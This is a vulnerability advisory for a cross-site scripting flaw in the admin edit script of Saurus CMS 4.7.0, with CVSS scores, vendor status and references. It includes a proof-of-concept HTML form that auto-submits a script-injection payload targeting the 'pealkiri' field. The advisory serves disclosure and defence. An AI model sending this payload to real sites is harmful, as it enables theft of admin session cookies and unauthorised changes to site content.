Saurus CMS 4.7.0 cross site scripting

2010-05-12 / 2010-05-13
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Vulnerability ID: HTB22361 Reference: http://www.htbridge.ch/advisory/xss_in_saurus_cms.html Product: Saurus CMS Community Editon Vendor: Saurused Ltd Vulnerable Version: 4.7.0 Vendor Notification: 27 April 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/admin/edit.php" script to properly sanitize user-supplied input in "pealkiri" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://www.example.com/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data"> <input type="hidden" name="tab" value="object" /> <input type="hidden" name="op" value="new" /> <input type="hidden" name="op2" value="" /> <input type="hidden" name="refresh" value="0" /> <input type="hidden" name="tyyp_id" value="1" /> <input type="hidden" name="tyyp" value="rubriik" /> <input type="hidden" name="pearubriik" value="0" /> <input type="hidden" name="id" value="27746" /> <input type="hidden" name="parent_id" value="27270" /> <input type="hidden" name="previous_id" value="" /> <input type="hidden" name="keel" value="1" /> <input type="hidden" name="on_pealkiri" value="1" /> <input type="hidden" name="sorting" value=""> <input type="hidden" name="extension_path" value="" /> <input type="hidden" name="opener_location" value="" /> <input type="hidden" name="publish" value="1" /> <input name="permanent_parent_id" type="hidden" value="27270" /> <input name="sys_alias" type="hidden" value="" /> <input name="advanced_panel_state" type="hidden" value="0" /> <input type="hidden" name="pealkiri" value='"><script>alert(document.cookie)</script>' /> <input type="hidden" name="friendly_url" value="scriptalertdocumentcookiescript" /> <input type="hidden" name="ttyyp_id" value="0" /> <input type="hidden" name="publish" value="1" /> <input type="hidden" name="rubriik[]" value="27270"> <input type="hidden" name="page_ttyyp_id" value="0" /> <input type="hidden" name="on_meilinglist" value="1" /> <input type="hidden" name="avaldamise_algus" value="" /> <input type="hidden" name="avaldamise_lopp" value="" /> <input type="hidden" name="kesk" value="0" /> </form> <script> document.editForm.submit(); </script>

References:

http://www.securityfocus.com/bid/40059
http://www.securityfocus.com/archive/1/archive/1/511223/100/0/threaded
http://www.htbridge.ch/advisory/xss_in_saurus_cms.html
http://secunia.com/advisories/39773
http://packetstormsecurity.org/1005-exploits/sauruscms-xss.txt
http://osvdb.org/64570


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top